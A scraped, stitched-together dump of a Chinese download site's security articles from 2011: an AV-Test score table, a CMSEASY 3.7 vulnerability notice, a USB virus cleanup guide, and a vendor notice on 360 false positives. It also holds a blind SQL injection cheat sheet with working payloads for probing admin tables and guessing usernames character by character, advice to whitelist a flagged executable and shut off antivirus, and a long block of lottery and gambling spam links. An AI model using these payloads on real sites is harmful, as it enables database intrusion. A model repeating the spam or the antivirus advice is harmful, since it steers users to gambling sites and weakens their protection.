</p><p><strong>第三阶段:</strong>全新代码时期</p><p>发展到现在“U盘杀毒精灵”也可以用脱胎换骨来形容了。因为它相比以前的版本已经有了质的飞跃。全部核心代码都经过重写,抛弃了对批处理文件的依赖。完全改变了病毒判断逻辑。经过优化的代码可以完美的在XP、VISTA和windows7系统下运行!</p><p><br /><img alt="" src="https://pic.cr173.com/up/2011-7/2011729102858356.jpg" /><br /><br />U盘杀毒精灵 V9.9.0.8 官方授权合作版:<a href="http://www.pjyuanjian.com/soft/30385.html">http://www.pjyuanjian.com/soft/30385.html</a></p> [安全产品]2011杀毒软件排行榜 AV-Test权威反病毒测试机构评测-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12474_1.html 西西 安全产品 2011/7/22 11:25:31 <p>擦,国内杀毒软件,安全软件市场内斗不停,国外权威反病毒机构评测,没有一家上榜。。。。鸭梨大呀!!!!</p><p>经历了三个月的评测,在昨日,德国独立反病毒测试机构AV-Test公布了2011年第二季度的杀毒软件性能评估报告!22款杀毒软件中,有16款顺利通过评测,而其中的六款不幸败北,下面分享2011年第二季度AV-Test评测结果,同时我将国内常用杀软评分结果按照从高到低列出以下杀毒软件排行榜,希望对大家选择杀毒软件有所帮助:</p><p><img src="http://img.cnbeta.com/newsimg/110722/102549019730432.jpg" alt="" /></p><p><strong>测试平台:</strong>Windows XP</p><p><strong>测试内容:</strong>将对杀毒软件的防护(动态和静态恶意代码检测)、修复(系统杀毒和Rootkit清除)和性能(使用该工具造成的系统变慢以及误报数量)进行了综合的评测!</p><p><strong>测试规则</strong>:每项测试满分6.0,总分18分,一款杀毒软件只有综合得分超过11分才能通过AV-Test认证</p><p><strong>国内常用杀毒软件测试结果</strong>:</p><table class="ke-zeroborder" cellspacing="0" cellpadding="2" width="401" border="0"><tbody><tr><td valign="top" width="110"><strong>产品</strong></td><td valign="top" width="74"><strong>认证</strong></td><td valign="top" width="60"><strong>总分</strong></td><td valign="top" width="51"><strong>防护</strong></td><td valign="top" width="48"><strong>修复</strong></td><td valign="top" width="56"><strong>性能</strong></td></tr><tr><td valign="top" width="110">BitDefender</td><td valign="top" width="74">通过</td><td valign="top" width="60">17.0</td><td valign="top" width="51">6.0</td><td valign="top" width="48">5.5</td><td valign="top" width="56">5.5</td></tr><tr><td valign="top" width="110">卡巴斯基</td><td valign="top" width="74">通过</td><td valign="top" width="60">16.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.5</td><td valign="top" width="56">5.0</td></tr><tr><td valign="top" width="110">熊猫Panda</td><td valign="top" width="74">通过</td><td valign="top" width="60">16.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.5</td><td valign="top" width="56">5.0</td></tr><tr><td valign="top" width="110">F-Secure</td><td valign="top" width="74">通过</td><td valign="top" width="60">15.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.0</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">Symantec</td><td valign="top" width="74">通过</td><td valign="top" width="60">14.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.0</td><td valign="top" width="56">3.5</td></tr><tr><td valign="top" width="110">Avast Free 6.0</td><td valign="top" width="74">通过</td><td valign="top" width="60">13.5</td><td valign="top" width="51">5.0</td><td valign="top" width="48">4.0</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">AVG</td><td valign="top" width="74">通过</td><td valign="top" width="60">13.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">4.5</td><td valign="top" width="56">3.0</td></tr><tr><td valign="top" width="110">Eset Nod32</td><td valign="top" width="74">通过</td><td valign="top" width="60">12.5</td><td valign="top" width="51">4.0</td><td valign="top" width="48">3.0</td><td valign="top" width="56">5.5</td></tr><tr><td valign="top" width="110">Trend Micro</td><td valign="top" width="74">通过</td><td valign="top" width="60">12.0</td><td valign="top" width="51">4.0</td><td valign="top" width="48">3.5</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">Avira (小红伞)</td><td valign="top" width="74">通过</td><td valign="top" width="60">12.0</td><td valign="top" width="51">3.5</td><td valign="top" width="48">4.5</td><td valign="top" width="56">4.0</td></tr><tr><td valign="top" width="110">MSE2.0</td><td valign="top" width="74">通过</td><td valign="top" width="60">12.0</td><td valign="top" width="51">2.5</td><td valign="top" width="48">4.5</td><td valign="top" width="56">5.0</td></tr><tr><td valign="top" width="110">Webroot</td><td valign="top" width="74">通过</td><td valign="top" width="60">11.0</td><td valign="top" width="51">2.0</td><td valign="top" width="48">5.0</td><td valign="top" width="56">4.0</td></tr><tr><td valign="top" width="110">PC Tools</td><td valign="top" width="74">未通过</td><td valign="top" width="60">10.5</td><td valign="top" width="51">4.0</td><td valign="top" width="48">4.5</td><td valign="top" width="56">2.0</td></tr><tr><td valign="top" width="110">McAfee</td><td valign="top" width="74">未通过</td><td valign="top" width="60">10.5</td><td valign="top" width="51">3.0</td><td valign="top" width="48">3.0</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">Norman</td><td valign="top" width="74">未通过</td><td valign="top" width="60">9.0</td><td valign="top" width="51">3.0</td><td valign="top" width="48">4.0</td><td valign="top" width="56">2.0</td></tr><tr><td valign="top" width="110">Comodo</td><td valign="top" width="74">未通过</td><td valign="top" width="60">7.0</td><td valign="top" width="51">3.5</td><td valign="top" width="48">1.5</td><td valign="top" width="56">3.0</td></tr></tbody></table><p>到官网查看杀软评测结果:<a href="http://www.av-test.org/certifications" target="_blank">点击此处进入</a>(可以了解评测杀软具体版本)</p><p>相对于参加VB100认证评测,参加AV-Test评测的门槛较高,评测机构会根据其杀毒引擎、样本库、病毒检索能力做判断是否进行评测,一些能力较差的杀毒软件很难进入评测名单。</p><p>在此次AV-Test评测中,很多大家熟悉的杀毒软件如BitDefender,卡巴斯基,NOD32,赛门铁克,Trend Micro(趋势),Avast,小红伞,微软免费杀毒软件MSE 都顺利通过评测,而McAfee,Norman,Comodo等杀软遗憾败北,Comodo在杀毒方面较为一般,但其防火墙与HIPS是十分强大的,建议单独使用!</p><p>评测名单中有两款免费杀毒软件MSE和Avast免费版参加评测,两者各有优势,用户可根据自身安全需要,选择使用!</p><p>相对于两个月一次的VB100认证,我认为AV-Test评测更加的严格和全面,首先AV-Test评测的参评门槛就很高,VB100则很低,从参加评测的杀软数量即可看出,其次,VB100只对其杀毒软件的杀毒能力进行评测,而AV-Test评测则是进行防护,修复和性能三方面的综合评测,例如如在VB100中通过次数也许永远会一直居首的NOD32在AV-Test中结果只能算中上等.</p><p>希望以上最新一期的杀毒软件排行对于大家选择杀毒软件有所帮助!</p> [病毒漏洞]易通企业网站系统CMSEASY 3.7最新漏洞发布-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12453_1.html 西西 病毒漏洞 2011/7/20 8:40:20 CMSEASY易通企业网站系统也称易通企业网站程序,是易通公司开发中国首套免费提供企业网站模板的营销型企业网站管理系统,系统前台生成html、完全符合SEO、同时有在线客服、潜在客户跟踪、便捷企业网站模板制作、搜索引擎推广等功能的企业网站系统。 基于 PHP+Mysql 架构的网站内容管理系统,也是一个 PHP 开发平台。 <br /><br />3.6那个版本的我爆过一次<br /><br />现在7.9日升级到了3.7版本,但是仍然存在漏洞<br /><br />依旧是那几个文件<br /><br />lib/mods/celive/menu_top.php<br />/lib/default/ballot_act.php<br />lib/default/special_act.php<br />lib/default/guestbook_act.php<br />/lib/default/tag_act.php<br />lib/default/type_act.php<br /><br />menu_top.php<br /><br />我已经通知官网了<br /><br />希望能够早日解决<br /> [安全产品]理解这些SQL注入技术 让你的网站不被攻击-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12424_1.html 西西 安全产品 2011/7/17 10:46:26 &nbsp;Cookies注入代码:<br />javascript:alert(document.cookie =&quot;参数= &quot;+escape(&quot;参数值 攻击代码&quot;))<br />如: javascript:alert(document.cookie =&quot;参数= &quot;+escape(&quot;参数值 and 1=1&quot;)) <br /><br />检测可否注入<br />http://127.0.0.1/xx?id=11 and 1=1 (正常页面)<br />http://127.0.0.1/xx?id=11 and 1=2 (出错页面)<br /><br />检测表段的<br /><br />http://127.0.0.1/xx?id=11 and exists (select * from admin)<br /><br />检测字段的<br /><br />http://127.0.0.1/xx?id=11 and exists (select username from admin)<br /><br />检测ID<br /><br />http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)<br /><br />检测长度的<br /><br />http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)<br /><br /><br />检测长度的<br /><br />http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)<br /><br />检测是否为MSSQL数据库<br /><br />http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)<br /><br />检测是否为英文<br /><br />(ACCESS数据库)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)<br /><br />(MSSQL数据库)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)<br /><br />检测英文的范围<br /><br />(ACCESS数据库)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)<br /><br />(MSSQL数据库)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)<br /><br />检测那个字符<br /><br />(ACCESS数据库)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)<br /><br />(MSSQL数据库)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)<br /><br />常用函数<br /><br />Access:asc(字符) SQLServer:unicode(字符)<br />作用:返回某字符的ASCII码<br /><br />Access:chr(数字) SQLServer:nchar(数字)<br />作用:与asc相反,根据ASCII码返回字符<br /><br />Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)<br />作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串<br /><br />Access:abc(数字) SQLServer:abc (数字)<br />作用:返回数字的绝对值(在猜解汉字的时候会用到)<br /><br />Access:A between B And C SQLServer:A between B And C<br />作用:判断A是否界于B与C之间<br /><br />and exists(Select top 1 * From 用户 order by id)<br /><br /><br />1.在查询结果中显示列名:<br />a.用as关键字:select name as '姓名' from students order by age<br />b.直接表示:select name '姓名' from students order by age<br /><br />2.精确查找:<br />a.用in限定范围:select * from students where native in ('湖南', '四川') <br />b.between...and:select * from students where age between 20 and 30<br />c.“=”:select * from students where name = '李山' <br />d.like:select * from students where name like '李%' (注意查询条件中有“%”,则说明是部分匹配,而且还有先后信息在里面,即查找以“李”开头的匹配项。所以若查询有“李”的所有对象,应该命令:'%李%';若是第二个字为李,则应为'_李%'或'_李'或'_李_'。)<br />e.[]匹配检查符:select * from courses where cno like '[AC]%' (表示或的关系,与&quot;in(...)&quot;类似,而且&quot;[]&quot;可以表示范围,如:select * from courses where cno like '[A-C]%')<br /><br /><br />3.对于时间类型变量的处理<br />a.smalldatetime:直接按照字符串处理的方式进行处理,例如:select * from students where birth &gt; = '1980-1-1' and birth &lt;= '1980-12-31'<br /><br /><br />4.集函数<br />a.count()求和,如:select count(*) from students (求学生总人数)<br />b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’<br />c.max(列)和min(列),求最大与最小<br /><br />5.分组group<br />常用于统计时,如分组查总数:select gender,count(sno) from students group by gender(查看男女学生各有多少)<br />注意:从哪种角度分组就从哪列&quot;group by&quot;<br />对于多重分组,只需将分组规则罗列。比如查询各届各专业的男女同学人数 ,那么分组规则有:届别(grade)、专业(mno)和<br />性别(gender),所以有&quot;group by grade, mno, gender&quot;<br />select grade, mno, gender, count(*) from students group by grade, mno, gender<br />通常group还和having联用,比如查询1门课以上不及格的学生,则按学号(sno)分类有:<br />select sno,count(*) from grades where mark&lt;60 group=&quot;&quot; by=&quot;&quot; sno=&quot;&quot; having=&quot;&quot; count=&quot;&quot;&gt;1<br /><br /><br />6.UNION联合<br />合并查询结果,如:<br />SELECT * FROM students WHERE name like ‘张%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’<br /><br /><br />7.多表查询<br />a.内连接<br />select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno<br />(注意可以引用别名)<br />b.外连接<br />b1.左连接<br />select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno<br />左连接特点:显示全部左边表中的所有项目,即使其中有些项中的数据未填写完全。<br /><br />左外连接返回那些存在于左表而右表中却没有的行,再加上内连接的行。<br />b2.右连接<br />与左连接类似<br />b3.全连接<br />select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno<br />两边表中的内容全部显示<br />c.自身连接<br />select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno<br />采用别名解决问题。<br />d.交*连接<br />select lastname+firstname from lastname CROSS JOIN firstanme<br />相当于做笛卡儿积<br /><br /><br />8.嵌套查询<br />a.用关键字IN,如查询猪猪山的同乡:<br />select * from students where native in (select native from students where name=’猪猪’) <br />b.使用关键字EXIST,比如,下面两句是等价的:<br />select * from students where sno in (select sno from grades where cno=’B2’)<br /><br />select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)<br /><br /><br />9.关于排序order<br />a.对于排序order,有两种方法:asc升序和desc降序<br />b.对于排序order,可以按照查询条件中的某项排列,而且这项可用数字表示,如:<br />select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)&gt;85 order by 3<br /><br />10.其他<br />a.对于有空格的识别名称,应该用&quot;[]&quot;括住。<br />b.对于某列中没有数据的特定查询可以用null判断,如select sno,courseno from grades where mark IS NULL<br />c.注意区分在嵌套查询中使用的any与all的区别,any相当于逻辑运算“||”而all则相当于逻辑运算“&amp;&amp;”<br />d.注意在做否定意义的查询是小心进入陷阱:<br />如,没有选修‘B2’课程的学生 :<br />select students.* from students, grades where students.sno=grades.sno AND grades.cno &lt;&gt; ’B2’ <br />上面的查询方式是错误的,正确方式见下方:<br />select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')<br /><br />11.关于有难度多重嵌套查询的解决思想:如,选修了全部课程的学生:<br />select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))<br />最外一重:从学生表中选,排除那些有课没选的。用not exist。由于讨论对象是课程,所以第二重查询从course表中找,排除那些选了课的即可。 [病毒漏洞]文件夹EXE病毒手动清理方法图文教程-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12417_1.html 西西 病毒漏洞 2011/7/16 16:31:18 U盘Folder.EXE病毒处理方法<br />1、 显示隐藏文件及系统文件,下图是Win 7文件夹选项截屏,XP操作相同。<br /><br /><img src="https://pic.cr173.com/up/2011-7/20117716161633196673.jpg" alt="" /><br /><br />2、 如果做了操作1后隐藏的系统文件仍然不能显示,进入注册表,找到下面路径<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL<br />删除改文件夹下的,字符串值“Checkedvalue”<br />在该目录下新建一个Doward值:“Checkedvalue”键值为“1” <br />如下图:已经修改,是正常的Doword值<br /><br /><img src="https://pic.cr173.com/up/2011-7/20117716161634254284.jpg" alt="" /><br /><br /><br />3、 我们这时候再回到刚才U盘下,删除所有的Folder.exe文件夹,清空U盘下Recovery下的所有文件<br />4、 打开“cmd”,输入U盘目录,例如X:,输入Attrib /s /d –s –h,等待片刻,U盘恢复正常<br /><br />备注:<a href="http://www.pjyuanjian.com/soft/22769.html" target="_blank">卡巴</a>等杀毒软件可以清除病毒,但是第2步和第4步还是要我们手动去操作。<br /> [系统安全]被360误报删除应用程序的解决方案-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12322_1.html 西西 系统安全 2011/7/13 10:27:09 <p>某些软件在安装运行软件的时候,装有360安全卫士和360杀毒软件的玩家出现异常查杀木马和病毒的相关对话框。用户可以通过以下方式进行解决并正常使用。<br />&nbsp;&nbsp;&nbsp;<br />近期360防病毒机制改变了,360的防毒会针对每个变动过的程序进行检查,由于我们软件版本的更新会影响到HnzQ.exe,所以每次软件安装360会误认为病毒,实际只是软件的应用程序HnzQ.exe。官方声明抄底王软件不存在任何的病毒和木马,客户可以放心使用。<br />下面官方针对360误报为玩家提供以下解决方案。用户可以根据以下处理方案进行正常使用。<br />一丶当软件安装时会跳出下面对话框,这个是360杀毒软件的误报行为客户只需要点击上图所标识的信任此文件即可正常进入游戏。</p><p><img src="http://adm.cr173.com/up/2011-7/20117713131030061189.png" alt="" /></p><p>二丶如客户同时装了360安全卫士和360杀毒软件,360杀毒软件误报玩家可以根据上面的方法进行操作,而360安全卫士则会跳出另外一个对话框要求客户删除HnzQ.exe这个文件,首先建议客户点击暂不处理,重新启动电脑,关闭360软件更新后尝试是否可以正常进入软件。</p><p><img src="http://adm.cr173.com/up/2011-7/20117713131030063384.jpg" alt="" /></p><p>再者,如点击立即清除,客户可以在360安全卫士的文件隔离区里找到刚才清除掉的HnzQ.exe,这个时候需要客户重启电脑,点击360安全卫士的文件恢复区对刚才被删除的文件进行文件恢复。见下图,并且把边上的框勾打上,点击确定后关闭360再次运行软件。或将电脑重启,先关闭360安全卫士,然后运行软件。</p><p><img src="http://adm.cr173.com/up/2011-7/20117713131030067286.png" alt="" /><br /><br /><img src="http://adm.cr173.com/up/2011-7/20117713131030065877.png" alt="" /></p> 啊彩彩票 www.196719.com-福建体彩开奖查询| www.216352.com-七星彩360-| www.282207.com-台湾三分彩开奖网| www.631781.com-e彩隐形眼镜| www.361091.com-有永安彩票吗| www.492755.com-彩票投注站不兑奖| www.10646.com-澳客网彩票比分| www.343556.com-彩票软件能赚钱吗| www.530090.com-铁公鸡七星彩票| www.952574.com-福彩短信投注双色球| www.uq95.com-1234cc天下彩| www.84ro.com-飞彩网能信吗| www.595315.com-双彩网蓬莱红帽| www.84tk.com-1288彩网合法吗| www.551954.com-欢乐彩票靠谱吗| www.757608.com-中彩网点数是什么| 500彩票www.330192.com| www.593741.com-久久彩票正规网站吗| www.67qa.com-福彩一年销售额| www.217095.com-彩神v8-| www.08967.com-福彩3d群聊微信号| www.80610.com-竞彩网精彩团队| www.176209.com-人人快三网-| www.362655.com-福彩3d今日走势| www.279512.com-5分时时彩走势| www.411401.com-七彩云南歌曲试听| www.549545.com-时时彩宝宝计划下载| www.278629.com-五福彩票苹果版下载| www.397435.com-三国彩票网址| www.505805.com-时时彩心态-| www.201966.com-体彩7星彩走势图| www.305069.com-七星彩历史所有开奖| www.87544.cc-彩票店微信扫码安全| www.206786.com-珍爱网彩票男| www.56zr.com-利奥彩票平台连接| www.5315.cm-坂田体彩-| www.66052.cc-好彩蓝莓双爆珠图片| www.085397.com-大发福彩官网| www.339433.com-深圳福彩投诉| www.578160.cc-足球竞彩论坛| www.934649.com-彩70官网-| www.ko33.com-幸运快三彩票兼职| www.23610.com-福彩3d大赢家免费| www.159090.com-外国彩票分析| www.374698.com-易彩网买彩票安全吗| www.098088.com-福彩到好运到| www.954626.com-国外彩票公司| www.5636.com-今日彩神通关注码| www.543198.com-快三技术-| www.120008.com-体彩排列五福彩| www.73382.com-博发彩票开奖网址| www.108929.com-苏宁彩票手机软件| www.585925.com-28彩票线路检测| www.ih09.com-买彩票就是一个坚持| www.cai6060.com河南快三开奖直播| www.309968.com-丢失彩票规定| www.120973.com-微信彩票群如何不封| www.002540.cc-福利彩票书籍| www.282316.com-福彩双色球图标| www.825011.com-江苏手游彩最新消息| www.58455.com-人人竞彩ios| www.626681.com-连中彩票安卓版| www.824873.com-竞彩猫专家收入| www.962750.com-旺旺彩票店-| www.262.cc-体彩排三图谜总汇| www.55hs.com-海南七星彩论| www.31612.cc-智慧福彩app下载| www.610257.com-体育彩票管理体制| www.88852.com-百盈彩票简介| www.109386.com-金利彩票骗局视频| www.wz52.com-福彩3d谜语图| www.688.date-辉煌彩票下载安装| www.20592.com-竞彩串关m串n表| www.079038.com-679彩票-| www.200322.com-大奖网彩票-| www.0352.pro-彩吧网双色球下载| www.096898.com-体彩的历史开奖结果| www.403092.com-陕西福彩快三走势图| www.848654.com-时时彩后二做号软件| www.563831.com-福彩3d头像-| www.069646.com-中国福彩网上购买| www.cp7955.com-快三万能四码图片| www.412764.com-微信上的中华彩| www.124.cx-彩35票下载-| www.qi01.com-彩票快三破解器准吗| www.329138.com-免费送试玩彩金| www.337864.com-大家乐彩票机技巧| www.25325.com-兰花彩铅绘画| www.70770.cc-舟山福彩快二| www.582887.com-彩神之首专家专栏| www.984225.com-3d字迷新彩网| www.36410.com-彩票投注是什么意思| www.611677.cc-500万彩票开奖| www.095173.com-爱彩乐网投可靠吗| www.bq69.com-广西快三app下载| www.352270.com-网易彩票提现流水| www.02971.com-体彩宁夏11选5| www.764097.com-经典彩版808| www.521430.com-福彩3d计算器直选| www.s33.org-福彩河北快三| www.074401.com-外围足彩app推荐| www.293726.com-体彩十一选五江苏| www.520657.com-航天彩虹无人机招聘| www.663851.com-cba篮球彩票| www.903687.com-安徽快三3不同计划| www.56535.cc-竞彩网强胆推荐记录| www.240110.com-双色球下期预测颖彩| www.99un.com-乐彩vip怎么下载| www.6111.win-中国福利七乐彩单式| www.96253.cc-见证中彩票的基督徒| www.331738.com-51彩票app-| www.ru04.com-吉林快三跨度杀号| www.386566.com-韩国时彩-| www.134583.com-江苏体彩大乐透推荐| www.856520.com-彩霸王跑狗图今期图| www.974953.com-棒棒彩票网页版| www.sk19.com-私彩代理-| 500万彩票www.608389.com| www.023516.com-彩票有几种玩法| www.556755.com-七星彩彩票开奖规定| www.488709.com-乐彩网快3下载| www.506391.com-u9彩票网可靠吗| www.628332.com-快乐彩票的邀请码| www.777486.com-彩乐园19码-| www.159062.com-云南快乐十分爱乐彩| www.886439.com-百度乐彩网-| www.cp2992.com-福建褔利彩票官网| www.6yq.com-买彩票那么多年| www.686831.com-中彩那天课文大意| www.oe96.com-手机买彩票安全可靠| www.678329.com-福彩3d长投计划| www.917422.com-必赢版手机彩票| www.kl26.com-新浪彩票双色球机选| www.0060.xyz-彩票名字大全百度| www.9039.cm-体彩篮球怎么玩| www.121634.com-郎咸平说彩票| www.250651.com-爱彩票app下载| www.366096.com-万彩吧网上购彩| www.550472.com-采购大厅江苏快三| www.806451.com-虚拟彩票游戏| www.958390.com-永信218彩票| www.2392.win-多彩彩票d55| www.8235.org-竞彩提点多少| www.67268.cc-邢台体彩中心| www.128406.com-快三大小口诀| www.435.xyz-彩票五百万中奖概率| www.300081.cc-快三号码速查表| www.175820.com-广西福彩快3走势图| www.343608.com-彩票软件怎么挣钱| www.am25.cc-152彩票app-| www.4078.net-318彩票平台靠谱| www.wy41.com-海南七星彩现场直播| www.28923.com-彩票号码可以控制| www.037508.com-超级彩票下载手机版| www.244344.com-中国体彩开奖| www.458274.com-中国七乐彩开奘结果| www.639750.com-牛牛彩票下载| www.cg05.com-网络快三彩票犯法吗| www.119331.com-代玩快三兼职| 500彩票www.26299f.com| www.516493.com-彩票47-| www.832227.com-福彩3地今天预测号| www.aj97.com-手机购买双色球彩票| www.550180.com-趣9购十分彩|